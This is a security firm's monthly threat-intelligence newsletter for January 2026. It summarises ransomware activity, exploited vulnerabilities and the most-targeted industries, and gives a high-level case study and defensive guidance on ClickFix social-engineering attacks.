MOXFIVE Monthly Insights - January 2026
In this newsletter, we share the latest ransomware and threat actor insights from the MOXFIVE team. Click button below to subscribe if not already on the MOXFIVE mailing list.

Subscribe

Ransomware Highlights for January 2026

Ransomware operations maintained steady pressure in  , with a modest decline from December’s volume, driven by established groups exploiting familiar vulnerabilities while social engineering techniques continued to evolve as effective initial access vectors. Qilin, Sinobi, and Akira led deployment activity, with Manufacturing and Production, Technology, and Healthcare bearing the greatest impact.

January brought a mix of targeted espionage and broad exploitation across critical enterprise infrastructure. APT28 weaponized a Microsoft Office security feature bypass in espionage campaigns targeting Ukraine and European nations. Critical vulnerabilities in Oracle WebLogic proxy components and Ivanti mobile device management systems both saw exploitation following disclosure. MOXFIVE responded to several cases involving ClickFix, a social engineering technique that manipulates users into executing malicious commands by impersonating legitimate system prompts. This month's Case Study examines how ClickFix campaigns function as initial access for ransomware deployment, while the Resilience Spotlight provides guidance on defending against user-initiated compromise that bypasses automated detection.

Top Threats & Exploits

Phishing emails, VPN vulnerabilities, lack of Multifactor Authentication (MFA), software flaws, drive-by downloads, and social engineering remain the most frequently observed initial access points for ransomware attacks.

  • Microsoft Office security feature bypass (CVE-2026-21509): This vulnerability allows threat actors to bypass OLE mitigations in Microsoft 365 and Office by sending a crafted document to a victim. Microsoft issued an out-of-band update on January 26, 2026, and confirmed active exploitation. APT28, a Russia-linked cyber espionage group, has been observed weaponizing this vulnerability in campaigns targeting Ukraine and European nations using malicious RTF files to deliver backdoors and email theft tools.
  • Oracle HTTP Server and WebLogic Server proxy plug-ins path handling vulnerability (CVE-2026-21962): This critical vulnerability impacts Oracle HTTP Server and the WebLogic Server Proxy Plug-ins for Apache HTTP Server and Microsoft IIS. An unauthenticated attacker with network access via HTTP can send crafted requests to gain unauthorized access to data, including the ability to create, delete, or modify critical information. The vulnerability affects versions 12.2.1.4.0, 14.1.1.0.0, and 14.1.2.0.0, with patches available in Oracle's January 2026 Critical Patch Update.
  • Ivanti Endpoint Manager Mobile code injection vulnerabilities (CVE-2026-1281/CVE-2026-1340): These critical vulnerabilities allow unauthenticated remote code execution on Ivanti's mobile device management solution. Ivanti confirmed exploitation affecting a limited number of customers before disclosure on January 29, 2026. Following the release of public proof-of-concept code, mass exploitation attempts were observed from multiple source IPs.

Active Threat Actors

Ransomware activity in January showed a modest decline compared to December. Ransomware-as-a-Service models continued to drive a significant portion of attacks in January, with affiliate-driven operations accounting for many of the actively deployed variants. Several newer operations also warrant monitoring based on recent visibility, including LockBit 5.0 and Warlock.

  • Qilin ranked as the most active ransomware variant deployed in January. The group's commission-based RaaS model, which offers affiliates up to 80-85% of ransom payments, has driven its popularity among cybercriminals. Qilin deployments include payloads for both Windows and Linux environments and rely on double extortion tactics
  • Sinobi remained active in January. The group emerged in mid-2025 and has rapidly scaled operations since MOXFIVE first encountered the variant in July. Sinobi uses double extortion tactics, with most observed victims in the United States and additional victims reported across several regions.
  • Akira, Inc. and Play all remained active in January. Akira was one of the most active RaaS operations in 2025 and continues that trend into 2026. Inc was first observed in 2023 and has since become a widely adopted double-extortion ransomware family. Play operates as a closed group, maintaining tight control over intrusions and deploying custom tooling for internal discovery and data exfiltration.
Graph showing the most active ransomware variants in January 2026 - Qilin 13%, Sinobi and Akira 11%, Inc 10% and Play 8%.

Figure 1: Top ransomware variants in January 2026 based on number of known victims.

The ransomware and industry rankings below are based on observed ransomware data leak site (DLS) activity for impacted organizations in the United States.

For a deeper look into these groups, MOXFIVE has published Threat Actor Spotlights on Qilin, Sinobi, Akira, Inc, and Play.

Top Industries Impacted by Ransomware

Manufacturing and Production remained the most impacted industry in January, continuing a trend observed throughout 2025. Threat actors continue to target this sector due to the high impact that business interruption can have and the use of connected supply chains that create multiple paths for initial access. Technology was the second most impacted industry, as service providers and software platforms often maintain direct integration with client networks and cloud environments, increasing the potential impact of a single intrusion.

Healthcare, Professional Services, and Retail and Hospitality also saw consistent ransomware activity in January. Healthcare organizations continued to face attacks due to the sensitivity of patient and operational data and their limited tolerance for sustained outages. Professional

Graph showing the industries most impacted by ransomware in January 2026. Manufacturing & Production - 18%, Technology - 17%, Healthcare - 11%, Professional Services -11%, and Retail and Hospitality -11%.


Figure 2: Top industries impacted by ransomware in January 2026.

Services firms remained targets as they often hold sensitive client information and intellectual property. Retail and Hospitality incidents often involve [TS1] organizations that process payment data or operate distributed physical locations, exposing point-of-sale systems and supporting infrastructure.

Manufacturing and Production drew attention from all five top-ranked variants in January. Play showed the highest concentration in the sector, while Sinobi activity was most concentrated across Manufacturing and Production, Healthcare, and Retail and Hospitality. Akira maintained its focus on Manufacturing and Production along with Construction and Engineering. Cl0p, while not ranked among the top five this month, posted several victims in Technology. [TS1]might read better if we change to "involve"

Case Study - ClickFix Social Engineering: Browser Prompts to System Compromise

MOXFIVE has responded to several recent cases involving ClickFix, a social engineering technique that manipulates users into executing malicious PowerShell commands by impersonating legitimate error messages or CAPTCHA verifications. First observed in March 2024, campaigns utilizing this technique have surged throughout 2025. Both cybercriminals and nation-state actors from North Korea, Iran, and Russia actively use ClickFix to deliver infostealers, remote access trojans, and ransomware, with the technique serving as initial access in some cases to deploy Qilin ransomware.

The attack relies on convincing users to paste malicious commands into Windows Run dialogs or PowerShell consoles under the pretext of fixing browser errors, completing security verifications, or resolving file access issues. In January 2026, Microsoft identified a new variant called CrashFix that deliberately crashes victims' browsers before presenting fake recovery instructions. ClickFix succeeds by bypassing traditional security controls through user-initiated execution, leaving no suspicious files or links for automated defenses to detect. The technique continues to evolve with variants including FileFix, JackFix, GlitchFix, and fake Windows update screens, all designed to exploit user trust in familiar system interfaces.

Resilience Spotlight - Defending Against ClickFix Social Engineering

ClickFix attacks succeed by bypassing technical controls and exploiting user behavior, requiring a defense strategy that combines user awareness with targeted monitoring. While traditional endpoint protections can struggle to detect user-initiated command execution, organizations can reduce exposure by restricting PowerShell execution policies, monitoring clipboard activity for suspicious patterns, and deploying email gateway filtering for HTML attachments. The most effective defense requires educating users that legitimate sites never ask them to paste commands into Run dialogs or PowerShell consoles.

Critical Controls for ClickFix Defense:

How MOXFIVE Can Help

MOXGUARD: Strategic advisory including AD/identity assessments, CVE alerting prioritized to active ransomware exploitation, guidance on segmentation and backup hardening, tabletop exercises with response playbooks, and pre-positioned incident response.

Professional Services: Control validation through EDR coverage assessments, purple team exercises, network segmentation reviews, backup immutability and restoration testing, external attack surface reduction, and SIEM/XDR detection engineering.

Our team has handled hundreds of ransomware cases against Qilin, Sinobi, Akira, Inc, Play, and other active operations, aligning preventive, detective, and recovery controls to current threat actor TTPs. Contact us at 833-568-6695 or incident@moxfive.com.